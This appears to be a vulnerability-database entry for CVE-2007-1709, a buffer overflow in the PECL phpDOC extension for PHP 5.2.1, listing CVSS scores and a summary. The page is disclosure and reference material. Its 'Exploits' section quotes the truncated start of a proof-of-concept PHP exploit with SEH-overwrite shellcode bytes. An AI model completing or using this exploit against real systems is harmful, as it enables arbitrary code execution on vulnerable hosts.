4.3
CVSSv2

CVE-2007-1709

Published: 27/03/2007 Updated: 16/10/2018
CVSS v2 Base Score: 4.3 | Impact Score: 6.4 | Exploitability Score: 3.1
VMScore: 435
Vector: AV:L/AC:L/Au:S/C:P/I:P/A:P

Vulnerability Summary

Buffer overflow in the confirm_phpdoc_compiled function in the phpDOC extension (PECL phpDOC) in PHP 5.2.1 allows context-dependent malicious users to execute arbitrary code via a long argument string.

Vulnerable Product Search on Vulmon Subscribe to Product

php php 5.2.1

Exploits

<?php //PHP 521 with PECL phpDOC confirm_phpdoc_compiled() local buffer overflow poc exploit //WIN 2K SP3 version / seh overwrite method //to be launched from the cli // by rgod // site: retrogodaltervistaorg if (!extension_loaded("phpDOC")){ die("you need the phpDOC extension loaded"); } $____scode= "\xeb\x1b" "\x5b" "\x31\xc0 ...